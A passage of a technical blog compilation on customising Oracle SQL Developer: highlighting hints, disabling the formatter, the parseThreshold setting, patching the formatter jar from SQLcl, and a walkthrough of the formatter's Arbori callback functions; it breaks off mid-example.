Channel: Philipp Salvisberg's Blog

Highlight Hints in SQL Developer


Introduction

In this blog post I explain how you can configure your SQL Developer to highlight hints and distinguish them from ordinary comments. The SQL Language Reference for Oracle Database 19c defines hints as follows:

Hints are comments in a SQL statement that pass instructions to the Oracle Database optimizer. The optimizer uses these hints to choose an execution plan for the statement, unless some condition exists that prevents the optimizer from doing so.

Furthermore

A statement block can have only one comment containing hints, and that comment must follow the SELECT, UPDATE, INSERT, MERGE, or DELETE keyword.

And here’s the syntax diagram:

You see that the comment containing hints starts with a +. The syntax for a hint is simplified: string must be read as a placeholder for various hint-specific options. You find a list of officially supported hints in the SQL Language Reference.
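For example, both comment styles below carry the same full hint for the table alias e (the emp table is just an illustration, it is not part of the syntax diagram):

SELECT /*+ full(e) */ * FROM emp e;

SELECT --+ full(e)
       * FROM emp e;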

In this blog post I covered how syntax highlighting works in SQL Developer and how to add a custom styler. If you are interested in the details, I recommend reading that blog post first.

The Problem

A custom styler written in Arbori works with nodes provided in the parse tree (target). However, the parse tree contains neither whitespaces nor comments. We still have access to the source code through the parse tree (target.input) and therefore to all comments, for example by creating a token stream via LexerToken.parse(target.input, true) and looking for tokens of type LINE_COMMENT and COMMENT. That’s not the problem.

The problem is that there is no functionality to style a token. We can only style a node by calling struct.addStyle(target, node, 'MyStyle'). We cannot highlight hints with this method.

Let’s dig deeper.

The global variable struct is an instance of the CustomSyntaxStyle class. Here’s an excerpt based on the representation in IntelliJ IDEA:

The excerpt shows the complete implementation of the addStyle method. The tokens of the passed node are added to a field named styles. This field is defined without an access modifier, hence it is package-private and not accessible by the Arbori program.

What can we do?

The Approach

We cannot solve the problem. Only the SQL Developer team can. But we can work around it: we can access the hidden field styles through Java reflection. Have a look at this excellent tutorial by Jakob Jenkov if you want to learn more. We will use this approach in the Arbori program.
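In plain Java the technique looks like this. This is a generic sketch with a made-up Holder class to keep it self-contained; it is not SQL Developer's actual code:

import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class ReflectionDemo {

    static class Holder {
        // package-private, like the styles field in CustomSyntaxStyle
        Map<Long, String> styles = new HashMap<>();
    }

    public static void main(String[] args) throws Exception {
        Holder holder = new Holder();
        Field field = Holder.class.getDeclaredField("styles");
        field.setAccessible(true); // bypass the access check
        @SuppressWarnings("unchecked")
        Map<Long, String> styles = (Map<Long, String>) field.get(holder);
        styles.put(42L, "Hints"); // we can now modify the hidden field
        System.out.println(holder.styles); // prints {42=Hints}
    }
}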

The Arbori Program to Highlight Hints

This Arbori program applies the style Hints for all hints within a worksheet or PL/SQL editor. I’ve tested it successfully with SQL Developer 19.2, 19.4 and 20.2.

Hints: 
  [node) sql_statements 
  -> {
    var getHints = function() {
      var LexerToken = Java.type('oracle.dbtools.parser.LexerToken'); 
      var Token = Java.type('oracle.dbtools.parser.Token');
      var tokens = LexerToken.parse(target.input, true);
      var hints = [];
      var prevToken = tokens[0];
      for (var i=1; i<tokens.size(); i++) {
        if ((tokens[i].type == Token.LINE_COMMENT || tokens[i].type == Token.COMMENT) && tokens[i].content.length > 3) {
          if (tokens[i].content.substring(2, 3) == "+") {
            var prev = prevToken.content.toLowerCase();
            if (prev == "select" || prev == "insert" || prev == "update" || prev == "delete" || prev == "merge") {
              hints[hints.length] = tokens[i];
              prevToken = tokens[i]
            }
          }
        }
        if (tokens[i].type != Token.WS && tokens[i].type != Token.LINE_COMMENT && tokens[i].type != Token.COMMENT) {
          prevToken = tokens[i];
        }
      }
      return hints;
    }

    var styleHints = function(hints) {
      var Service = Java.type('oracle.dbtools.util.Service');
      var Long = Java.type('java.lang.Long');
      var stylesField = struct.getClass().getDeclaredField("styles");
      stylesField.setAccessible(true);
      var styles = stylesField.get(struct);
      for (var i in hints) {
        var pos = new Long(Service.lPair(hints[i].begin, hints[i].end));
        styles.put(pos, "Hints");
      }
    }

    // main
    styleHints(getHints());
  }

Here are some explanations:

  • The query Hints matches the root node containing all sql_statements. As a result, the JavaScript callback is executed only once.
  • The main program at the end of the callback collects all hints by calling the local function getHints() and styles them by calling the local function styleHints().
  • In getHints() we populate all tokens including whitespaces and comments by calling LexerToken.parse(target.input, true).
  • We add a comment token to the result list only if its content starts with a + and it directly follows a SELECT, INSERT, UPDATE, DELETE or MERGE keyword, in other words, only if it is a relevant comment containing hints.
  • In styleHints() we provide the invisible field styles of the struct object as variable styles with the help of the Java Reflection API.
  • The call to Service.lPair combines the start and end position of a token into a single Long value. This value identifies a token in the editor.
  • And finally we apply the style Hints to all hint tokens by putting them into the styles map.

Register Style Hints

Add the Arbori program Hints to the PL/SQL custom Syntax Rules in the preference dialog as shown below:

Save the preferences by pressing the OK button and then restart SQL Developer. This is necessary to register the new custom Style Hints.

Then, after restarting SQL Developer, open the preferences dialog again and configure the style Hints the way you want.

The Result

In the next screenshot you see a simple query with two syntactically correct hints. However, as mentioned in the introduction, only the first comment containing hints is considered by the Oracle Database and therefore highlighted in red.

The second query produces the execution plan including a hint report for the first query. As you see, only the first hint full(e) is used. The second hint full(d) does not even show up in the hint report as an ignored hint. It is an ordinary comment after all.
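The screenshots are not reproduced here, but statements along the following lines illustrate the point. The table names, aliases and the dbms_xplan call are my assumptions based on the hints full(e) and full(d) mentioned above:

select /*+ full(e) */ e.ename, d.dname /*+ full(d) */
  from emp e
  join dept d on d.deptno = e.deptno;

select * from dbms_xplan.display_cursor(format => 'BASIC +HINT_REPORT');

The hint report of the second query should list only full(e); the second comment is never mentioned.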

 



Disable Formatter for Code Sections in SQL Developer


In this blog post I show how you can disable the formatter for some parts of your code. IntelliJ IDEA and the Eclipse IDE use tags in comments to identify sections of code that must not be formatted. By default these tags are @formatter:off and @formatter:on.

Example

SET SERVEROUTPUT ON
--
      begin                                 for rec 
   in(select r                          .country_region
  as region ,p .                       prod_category,sum(
 s.amount_sold ) as                  amount_sold from sales
s join products p on                p . prod_id = s .prod_id
join customers cust on           cust.cust_id=s.cust_id join
times t on t . time_id =s.     time_id join countries r on
  r.country_id = cust.country_id  where  calendar_year =
     2000 group by r.country_region , p.prod_category
       order by r .country_region, p.prod_category
         ) loop if rec . region = 'Asia' then if
           rec.prod_category = 'Hardware' then
             /* print only one line for demo
                purposes */sys.dbms_output
                  . put_line ( 'Amount: '
                    ||rec.amount_sold);
                      end if;end if;
                        end loop;
                          end;
                           /
--
SELECT FISCAL_YEAR, COUNT(*) FROM SALES S 
NATURAL JOIN TIMES T GROUP BY FISCAL_YEAR ORDER BY 1;

When I format this code with SQL Developer 20.2 and the default Trivadis PL/SQL & SQL Formatter Settings (plus lowercase keywords, lowercase identifiers) the result looks like this:

set serveroutput on
--
begin
   for rec in (
      select r.country_region as region,
             p.prod_category,
             sum(s.amount_sold) as amount_sold
        from sales s
        join products p
          on p.prod_id = s.prod_id
        join customers cust
          on cust.cust_id = s.cust_id
        join times t
          on t.time_id = s.time_id
        join countries r
          on r.country_id = cust.country_id
       where calendar_year = 2000
       group by r.country_region,
                p.prod_category
       order by r.country_region,
                p.prod_category
   ) loop
      if rec.region = 'Asia' then
         if rec.prod_category = 'Hardware' then
             /* print only one line for demo
                purposes */
            sys.dbms_output.put_line('Amount: ' || rec.amount_sold);
         end if;
      end if;
   end loop;
end;
/
--
select fiscal_year,
       count(*)
  from sales s
natural join times t
 group by fiscal_year
 order by 1;

Argh, I do not want the PL/SQL block to be formatted. I spent enough time formatting it manually and I want to keep it that way. Let’s add @formatter:off and @formatter:on tags to the original code like this:

SET SERVEROUTPUT ON
-- @formatter:off
      begin                                 for rec 
   in(select r                          .country_region
  as region ,p .                       prod_category,sum(
 s.amount_sold ) as                  amount_sold from sales
s join products p on                p . prod_id = s .prod_id
join customers cust on           cust.cust_id=s.cust_id join
times t on t . time_id =s.     time_id join countries r on
  r.country_id = cust.country_id  where  calendar_year =
     2000 group by r.country_region , p.prod_category
       order by r .country_region, p.prod_category
         ) loop if rec . region = 'Asia' then if
           rec.prod_category = 'Hardware' then
             /* print only one line for demo
                purposes */sys.dbms_output
                  . put_line ( 'Amount: '
                    ||rec.amount_sold);
                      end if;end if;
                        end loop;
                          end;
                           /
-- @formatter:on
SELECT FISCAL_YEAR, COUNT(*) FROM SALES S 
NATURAL JOIN TIMES T GROUP BY FISCAL_YEAR ORDER BY 1;

Now the formatter keeps the PL/SQL block as it is and formats only the rest.

set serveroutput on
-- @formatter:off
      begin                                 for rec 
   in(select r                          .country_region
  as region ,p .                       prod_category,sum(
 s.amount_sold ) as                  amount_sold from sales
s join products p on                p . prod_id = s .prod_id
join customers cust on           cust.cust_id=s.cust_id join
times t on t . time_id =s.     time_id join countries r on
  r.country_id = cust.country_id  where  calendar_year =
     2000 group by r.country_region , p.prod_category
       order by r .country_region, p.prod_category
         ) loop if rec . region = 'Asia' then if
           rec.prod_category = 'Hardware' then
             /* print only one line for demo
                purposes */sys.dbms_output
                  . put_line ( 'Amount: '
                    ||rec.amount_sold);
                      end if;end if;
                        end loop;
                          end;
                           /
-- @formatter:on
select fiscal_year,
       count(*)
  from sales s
natural join times t
 group by fiscal_year
 order by 1;

This does not work out of the box, so you have to configure SQL Developer accordingly, either by importing the latest Trivadis PL/SQL & SQL Formatter Settings (as I’ve done) or by adding an Arbori query yourself. I explain the latter in the next section.

Configure SQL Developer

To configure this solution you need SQL Developer 19.2 or later. Open the preferences dialog and go to Code Editor -> Format -> Advanced Format -> Custom Format.

Add the following Arbori query (e.g. after the dontFormatNode query). The position is not that important.

dontFormatOffOnRanges: runOnce -> {
    var Integer = Java.type('java.lang.Integer');
    var LexerToken = Java.type('oracle.dbtools.parser.LexerToken'); 
    var Token = Java.type('oracle.dbtools.parser.Token');
    var tokens = LexerToken.parse(target.input, true);  // include hidden tokens not relevant to build a parse tree
    var hiddenTokenCount = 0;
    var format = true;
    for (var i in tokens) {
      if (tokens[i].type == Token.LINE_COMMENT || tokens[i].type == Token.COMMENT) {
        if (tokens[i].content.toLowerCase().contains("@formatter:off") ||
            tokens[i].content.toLowerCase().contains("noformat start")) 
        {
          format = false;
        }
        if (tokens[i].content.toLowerCase().contains("@formatter:on") ||
            tokens[i].content.toLowerCase().contains("noformat end"))
        {
          format = true;
        }
        hiddenTokenCount++;
      } else if (tokens[i].type == Token.WS || tokens[i].type == Token.MACRO_SKIP ||
                 tokens[i].type == Token.SQLPLUSLINECONTINUE_SKIP) 
      {
        hiddenTokenCount++
      } else {  
        /* expected types: QUOTED_STRING, DQUOTED_STRING, BQUOTED_STRING, DIGITS, 
                           OPERATION, IDENTIFIER, AUXILIARY, INCOMPLETE */
        if (!format) {
          struct.unformattedPositions.add(new Integer(i-hiddenTokenCount));
        }
      }
    }
  }

Here are some explanations:

SQL Developer’s formatter class has a public field named unformattedPositions of type Set<Integer>. It contains all token positions that must not be formatted. We just have to extend this set. However, the parse tree contains only relevant tokens; whitespaces and comments are not part of it. But we need single-line and multi-line comments to disable and enable the formatter. That’s why we read all tokens via LexerToken.parse(target.input, true).

In the final else branch we decide whether a token should be added to unformattedPositions. The variable i contains the current token position in the complete token stream. The variable hiddenTokenCount contains the number of preceding tokens that are not part of the parse tree. Hence i-hiddenTokenCount equates to the token position in the parse tree. For example, if the token at position 10 is preceded by 4 whitespace or comment tokens, its position in the parse tree is 6. The rest should be self-explanatory.

Read this post to learn more about Arbori and how the formatter works.


Navigation in Large PL/SQL Code


Are you editing large PL/SQL code in SQL Developer? Have you noticed that sometimes you cannot navigate to a declaration anymore? No Ctrl-Click under Windows. No Command-Click under macOS. In this blog post I explain the reason and how to fix that in SQL Developer 20.2.

What Is Large?

Usually, we define the size of code using common software metrics. Here are some examples:

  • characters,
  • lines,
  • statements,
  • McCabe’s cyclomatic complexity,
  • Halstead volume or
  • maintainability index.

SQL Developer uses the number of lexer tokens. For SQL Developer the magic number is 15000 lexer tokens. This is the so-called parseThreshold. PL/SQL code with 15000 lexer tokens or more is considered large.

Counting Lexer Tokens

Lexer tokens are similar to words. They are used as input for the parser. In fact, some lexer tokens are irrelevant for parsing: whitespaces and comments, for instance. Here is an example:

begin
   dbms_output.put_line('Hello World!');
end;
/

This code contains the following 11 relevant lexer tokens:

  • begin (IDENTIFIER)
  • dbms_output (IDENTIFIER)
  • . (OPERATION)
  • put_line (IDENTIFIER)
  • ( (OPERATION)
  • Hello World! (QUOTED_STRING)
  • ) (OPERATION)
  • ; (OPERATION)
  • end (IDENTIFIER)
  • ; (OPERATION)
  • / (OPERATION)

I put the token type in parentheses.

You can run the following Arbori program to print the number of lexer tokens in the SQL Developer console.

countTokens:
  [node) sql_statements
  -> {
    var LexerToken = Java.type('oracle.dbtools.parser.LexerToken'); 
    var Token = Java.type('oracle.dbtools.parser.Token');
    var tokens = LexerToken.parse(target.input, false);
    print("Number of tokens: " + tokens.size());
  }

Change parseThreshold Temporarily

The default parseThreshold is 15000. With that value the navigation to dbms_output.put_line is possible.

A link is displayed when you hold down the Ctrl key under Windows or the Command key under macOS while you move the mouse pointer over a linkable item.

Fortunately, we don’t need to generate larger code to see what happens when we reach the parseThreshold. We can simply set the parseThreshold to 11 by executing the following command in a separate worksheet. The database connection is irrelevant.

set hidden param parseThreshold = 11;

Now we have to force a re-parse, for example by cutting and pasting the code. Afterwards you should see an empty code outline window.

The parseThreshold has been reached and SQL Developer does not parse the code anymore. As a result, you cannot navigate to the declaration of dbms_output.put_line. You cannot enable the link. SQL Developer needs the parse tree for the navigation. No parse-tree, no navigation.

But it is easy to get it working again. Just remove a token. The / at the end, for instance. Now we have only 10 lexer tokens. A complete code outline is shown and code navigation works again.

Change parseThreshold Permanently

You can configure a script to be executed when opening a connection in SQL Developer.

In this script you can define a higher threshold value. An order of magnitude higher than the default value should be sufficient for most cases.

set hidden param parseThreshold = 150000;

What’s the Impact of a Higher parseThreshold?

There is no impact if you work with PL/SQL and SQL code with fewer than 15000 lexer tokens.

However, if you work with larger code, the code editor will need more time to open. And of course it will consume more memory. That’s the price you pay for enabling navigation in large PL/SQL code.


Patching SQL Developer 20.2 with SQLcl’s Formatter


Introduction

SQLcl 20.3.0 was released on October 29, 2020. It’s the first time I remember that we have a SQLcl version without the corresponding SQL Developer version. This is a pity because this SQLcl version also contains formatter fixes. And formatting code is something I do more often in the full-blown IDE than in the stripped down command line interface. In this blog post I show you how you can patch your SQL Developer installation and make the formatter fixes available there as well.

Disclaimer

What I do here is an experiment and most probably not really legal. It’s nothing I suggest you should do in your production environment. If you feel uneasy, don’t do it. What you do might destroy your SQL Developer installation.

Prerequisites

For this experiment you need

  • SQLcl 20.3.0
  • SQL Developer 20.2.0
  • JDK 8 or JDK 11

These software components must all be installed on your computer. I do not explain in this blog post how to do that.

Overview

SQLcl and SQL Developer provide a dbtools-common.jar file. This file contains the formatter (among other things). We copy this file from the SQLcl installation to the SQL Developer installation. That would be all if SQL Developer loaded the Guava library before opening a connection. But it does not, because this was not required for version 20.2 of dbtools-common.jar. Therefore we put the VersionTracker.class (which does not use Guava) from the original SQL Developer installation into the dbtools-common.jar file.

Step by Step Instruction

Step 1 – Quit SQL Developer

We are going to patch SQL Developer. This is not possible on Windows if SQL Developer is running. On other operating systems it might have strange effects. Therefore quit SQL Developer.

Step 2 – Rename SQLDev’s dbtools-common.jar

Find the dbtools-common.jar in your SQL Developer installation. In my case the file is in this directory: /Applications/SQLDeveloper20.2.0.app/Contents/Resources/sqldeveloper/sqldeveloper/lib. Rename this file to dbtools-common.original.jar.


macOS:

cd /Applications/SQLDeveloper20.2.0.app/Contents/Resources/sqldeveloper/sqldeveloper/lib
mv dbtools-common.jar dbtools-common.original.jar


Windows:

cd C:\app\sqldeveloper20.2.0\sqldeveloper\lib
ren dbtools-common.jar dbtools-common.original.jar

Step 3 – Copy SQLcl’s dbtools-common.jar

Find the dbtools-common.jar in your SQLcl installation. In my case the file is in this directory: /usr/local/bin/sqlcl/lib. Copy the file to SQLDev’s directory (where the dbtools-common.original.jar is located).


macOS:

cd /usr/local/bin/sqlcl/lib
cp dbtools-common.jar /Applications/SQLDeveloper20.2.0.app/Contents/Resources/sqldeveloper/sqldeveloper/lib


Windows:

cd C:\app\sqlcl\lib
copy dbtools-common.jar C:\app\sqldeveloper20.2.0\sqldeveloper\lib

Step 4 – Patch dbtools-common.jar

Open a terminal window and change to the directory of the dbtools-common.original.jar file. Run the following commands there to create a patched version of dbtools-common.jar:


macOS:

cd /Applications/SQLDeveloper20.2.0.app/Contents/Resources/sqldeveloper/sqldeveloper/lib
jar -xvf dbtools-common.original.jar oracle/dbtools/db/VersionTracker.class
jar -u0vMf dbtools-common.jar oracle/dbtools/db/VersionTracker.class
rm -rf oracle


Windows:

cd C:\app\sqldeveloper20.2.0\sqldeveloper\lib
jar -xvf dbtools-common.original.jar oracle/dbtools/db/VersionTracker.class
jar -u0vMf dbtools-common.jar oracle/dbtools/db/VersionTracker.class
rmdir /s /q oracle

Here is some explanation:

  • First we change to the directory where the files dbtools-common.original.jar (version 20.2.0) and dbtools-common.jar (version 20.3.0) are stored. In your case the directory name may differ.
  • On the second line we extract the VersionTracker.class from the dbtools-common.original.jar file. The class is stored in a newly created directory oracle/dbtools/db.
  • On the third line we copy the previously extracted VersionTracker.class into the dbtools-common.jar file.
  • And on the last line we remove the oracle directory and its subdirectories.

Formatter Improvements

An example is the best way to show the difference between version 20.2 and 20.3. I use the default formatter settings with just one change: “No breaks” for “Line Breaks On Boolean connectors”.

And here are the results after formatting the code once.

There are two significant improvements of the formatter. Both are related to comment and whitespace handling and therefore are independent of an Arbori program.

  • The line of code after a comment is no longer indented additionally.
  • The line break after a single-line comment is no longer lost. As a result, the formatter will no longer comment out code.

While the first bug leads to badly formatted code, the second bug is really nasty. It breaks your code. This happens when you use single-line comments on consecutive lines. In most cases this will lead to compile errors. However, I showed that the resulting code may be syntactically correct and a wrong formatting result could go unnoticed.

 

 

 


Formatter Callback Functions


Introduction

In this blog post I explained how the formatter in SQL Developer works and outlined how you can change the formatter result using Arbori and JavaScript. In this post I explain what exactly the provided formatter callback functions do. For that I use simple examples. I produced all results with a patched version of SQL Developer 20.2. However, I expect that the results for version 20.2, 19.4 and 19.2 are the same.

Minimal Arbori Program

Before looking at the callback function, I’d like to reduce the Arbori program to the minimum. Why? Because this visualises the default behaviour of the formatter. Furthermore it will simplify the subsequent examples.

One could think about removing the entire Arbori program. But that won’t work. An empty Arbori program is an invalid Arbori program and SQL Developer will reset it to the default.

A minimal Arbori program looks as follows, the comment section explains the required parts.

/**
 * Minimal version of a custom Arbori formatter program.
 *
 * oracle.dbtools.app.Format checks if 
 *
 *    - skipWhiteSpaceBeforeNode exists
 *    - :indentConditions is used somewhere
 *
 * The Arbori program is considered invalid, if these 
 * minimal requirement are not met and it is reset 
 * to the default value.
 */

dummy:  
  :indentConditions & [node) 'dummy_node_cond' 
;

skipWhiteSpaceBeforeNode:
  [node) 'dummy_node_skip_ws_before'  
  ->
;

I use default values for all other formatter settings as the following three screenshots show.

You can see that tokens are separated by a space. A line break is added after reaching the line size limit. Keywords are changed to upper case. However, all identifiers are treated as keywords; no identifiers are changed to lower case as configured. Besides the “1-line long comments” setting, no other configuration has an effect with this minimal Arbori program. In other words, the Arbori program is involved in the application of most formatter configuration settings.

Just to be clear: this Arbori program does nothing. :indentConditions is technically used in the dummy query, but the query does not produce a result. Even if it did, it is not used anywhere. And the query skipWhiteSpaceBeforeNode looks for a non-existent node type. So the query returns no result and therefore the callback function skipWhiteSpaceBeforeNode is not called.

Callback Functions

A formatter callback function in SQL Developer has the following Java signature:

public void callbackFunctionName (
   oracle.dbtools.parser.Parsed target, 
   Map<String, oracle.dbtools.parser.ParseNode> tuple
) {...}

target contains the parse tree. And tuple contains the nodes to process. An Arbori query can return multiple columns and multiple rows. A tuple contains the columns of a single row. Therefore, a callback function is called per Arbori query result row. But what columns are expected in tuple? I have not found a document describing that. This is one of the reasons for this blog post. Most of the callback functions expect a column named node. But not all of them.

Most of the formatter callback functions just populate an internal list of whitespaces before a node. Technically it is implemented as a Map<Integer, String> and is named newLinePositions. The key (Integer) is the position of a node (lexer token) in the parse tree. The value (String) contains the whitespaces before this position.

Most callback functions expect existing entries in newLinePositions. This leads to a strict execution order.

Here’s the ordered list of all callback functions. The functions marked with an asterisk can be called at any position in an Arbori program; for all others the position matters.

  • dontFormatNode *
  • indentedNodes1
  • indentedNodes2
  • skipWhiteSpaceBeforeNode *
  • skipWhiteSpaceAfterNode *
  • identifiers *
  • extraBrkBefore
  • extraBrkAfter
  • brkX2
  • rightAlignments
  • paddedIdsInScope
  • incrementalAlignments
  • pairwiseAlignments
  • ignoreLineBreaksBeforeNode
  • ignoreLineBreaksAfterNode

I will discuss them in the next chapters based on this example:


SET SERVEROUTPUT ON

BEGIN
    FOR r IN (SELECT ename  AS emp_name,
                     sal    AS salary
                FROM emp
               WHERE deptno IN (10, 20))
    LOOP
        IF r.salary > 2.9e3 THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/


SET SERVEROUTPUT ON BEGIN FOR R IN ( SELECT ENAME AS EMP_NAME , SAL AS SALARY FROM EMP WHERE DEPTNO IN ( 10 , 20 ) ) LOOP IF R . SALARY >
 2 . 9 E 3 THEN DBMS_OUTPUT . PUT_LINE ( R . EMP_NAME ) ; END IF ; END LOOP ; END ;
/

dontFormatNode

I start with this function, because the example contains an exponential number 2.9e3. The default formatting adds spaces around all lexer tokens. The result 2 . 9 E 3 breaks the code. I’d like to fix that first, so we are not distracted by this syntax error and can concentrate on formatting code.

This function expects a node in tuple. It identifies nodes that must not be formatted. In other words, the node keeps all its whitespaces. Behind the scenes the function adds all positions to a Set<Integer> named unformattedPositions. The serializer will ignore all positions in newLinePositions if a position exists in unformattedPositions. As a result, the position of dontFormatNode in the Arbori program is irrelevant.

In this blog post I showed how you can use dontFormatNode to ignore chosen code sections with @formatter:off and @formatter:on comments.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

dummy:  
  :indentConditions & [node) 'dummy_node_cond' 
;

skipWhiteSpaceBeforeNode:
  [node) 'dummy_node_skip_ws_before'  
  ->
;


SET SERVEROUTPUT ON BEGIN FOR R IN ( SELECT ENAME AS EMP_NAME , SAL AS SALARY FROM EMP WHERE DEPTNO IN ( 10 , 20 ) ) LOOP IF R . SALARY >
 2.9e3 THEN DBMS_OUTPUT . PUT_LINE ( R . EMP_NAME ) ; END IF ; END LOOP ; END ;
/

The second line of the query contains the query condition. The -> on the third line calls the callback function. The name of the function must match the query name, in this case dontFormatNode. The result shows a difference on its second line: the numeric literal 2.9e3 does not contain whitespaces anymore.

indentedNodes1

This function expects a node in tuple. It’s a preparation step for indentedNodes2. Calling this function alone will not change the formatting result. It populates a Map<Integer, Integer> named posDepths. The key is the position and the value is the number of indentations. You can think of an indentation as the number of tabs, even if you use spaces for indentation.

indentedNodes2

This function expects the very same input as for indentedNodes1. It converts the number of indentations to spaces or tabs according to the formatter configuration and adds them to newLinePositions.

The Arbori program uses :indentConditions on line 8. This is a parameterless function returning a Boolean value. It’s part of the formatter and can be used in an Arbori query. :indentConditions returns true if the setting for “Line Breaks IF/CASE/WHILE” is set to “Indented Conditions and Actions” as in the following screenshot.

Here is the Arbori program and the formatting results. The first result is based on the default settings for “Line Breaks IF/CASE/WHILE” (Indented Actions, Inlined Conditions) and the second result is based on “Indented Conditions and Actions”.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
  [node) 'dummy_node_skip_ws_before'  
  ->
;


SET SERVEROUTPUT ON BEGIN
    FOR R IN ( SELECT ENAME AS EMP_NAME , SAL AS SALARY FROM EMP WHERE DEPTNO IN ( 10 , 20 ) ) LOOP
        IF R . SALARY > 2.9e3 THEN
            DBMS_OUTPUT . PUT_LINE ( R . EMP_NAME ) ;
        END IF ;
    END LOOP ;
END ;
/


SET SERVEROUTPUT ON BEGIN
    FOR R IN ( SELECT ENAME AS EMP_NAME , SAL AS SALARY FROM EMP WHERE DEPTNO IN ( 10 , 20 ) ) LOOP
        IF
            R . SALARY > 2.9e3
        THEN
            DBMS_OUTPUT . PUT_LINE ( R . EMP_NAME ) ;
        END IF ;
    END LOOP ;
END ;
/

The query condition is defined on lines 6 to 9 and is used on lines 11 and 15. This change has a huge impact on the formatting result. Both results look quite good.

You also see that the Arbori program is responsible for dealing with different formatter settings. To simplify the Arbori program I will ignore all other formatter settings. All further formatting results are based on :indentConditions.

skipWhiteSpaceBeforeNode

This function expects a node in tuple. It adds the starting position of the node to a Set<Integer> named skipWSPositions. The serializer will use this set and change the default behaviour accordingly. This means it will emit no whitespace instead of a single whitespace at this node position. As a result, the position of skipWhiteSpaceBeforeNode in the Arbori program is irrelevant.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;


SET SERVEROUTPUT ON BEGIN
    FOR R IN ( SELECT ENAME AS EMP_NAME, SAL AS SALARY FROM EMP WHERE DEPTNO IN ( 10, 20)) LOOP
        IF
            R. SALARY > 2.9e3
        THEN
            DBMS_OUTPUT. PUT_LINE ( R. EMP_NAME);
        END IF;
    END LOOP;
END;
/

The formatter removed the space before ;, ,, ) and . on lines 2, 4, 6, 7 and 8.

skipWhiteSpaceAfterNode

This function expects a node in tuple. It is similar to skipWhiteSpaceBeforeNode. The only difference is that it adds the end position of a node to skipWSPositions.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;


SET SERVEROUTPUT ON BEGIN
    FOR R IN (SELECT ENAME AS EMP_NAME, SAL AS SALARY FROM EMP WHERE DEPTNO IN (10, 20)) LOOP
        IF
            R.SALARY > 2.9e3
        THEN
            DBMS_OUTPUT.PUT_LINE (R.EMP_NAME);
        END IF;
    END LOOP;
END;
/

The formatter removed the space after ( and . on lines 2, 4 and 6.

identifiers

This function expects an identifier in tuple. It populates a Map<String, String> named caseIds. The key is an interval representation of a node (containing to and from position). The value contains the identifier according to the formatter settings. The serializer will use this map to emit the identifiers in the configured case. newLinePositions is not used. As a result, the position of identifiers in the Arbori program is irrelevant.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;


SET SERVEROUTPUT ON BEGIN
    FOR r IN (SELECT ename AS emp_name, sal AS salary FROM emp WHERE deptno IN (10, 20)) LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

You see that the identifiers r, ename, emp_name, sal, salary, emp, dbms_output and put_line are in lowercase.

extraBrkBefore

This function expects a node in tuple. It extracts the whitespaces at the starting position from newLinePositions and adds a leading newline.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;


SET SERVEROUTPUT ON
BEGIN
    FOR r IN (SELECT ename AS emp_name, sal AS salary
    FROM emp
    WHERE deptno IN (10, 20))
    LOOP
        IF
            r.salary > 2.9e3
        THEN
            dbms_output.put_line (r.emp_name);
        END IF;
    END LOOP;
END;
/

The formatter added a newline before BEGIN on line 2, before FROM on line 4, before WHERE on line 5 and before LOOP on line 6.

extraBrkAfter

This function expects a node in tuple. It is similar to extraBrkBefore. The only difference is that it adds the end position of a node to newLinePositions.

Here is the Arbori program and its formatting result.


dontFormatNode:
  [node) numeric_literal
  ->
;

indentedNodes:
    [node) seq_of_stmts
  | :indentConditions & [node) pls_expr & [node-1) 'IF'
;

indentedNodes1: indentedNodes 
  ->
;

indentedNodes2: indentedNodes 
  ->
;

skipWhiteSpaceBeforeNode:
    [node) ';'
  | [node) ','
  | [node) ')'
  | [node) '.'
  ->
;

skipWhiteSpaceAfterNode:
    [node) '('
  | [node) '.'
  ->
;

identifiers:
  [identifier) identifier 
  -> 
;

extraBrkBefore: 
    [node) sql_statement
  | [node) from_clause
  | [node) where_clause
  | [node) 'LOOP' & [node-1) iteration_scheme
  ->
;

extraBrkAfter: 
  [node) ',' & [node+1) select_term 
  ->
;


SET SERVEROUTPUT ON
BEGIN
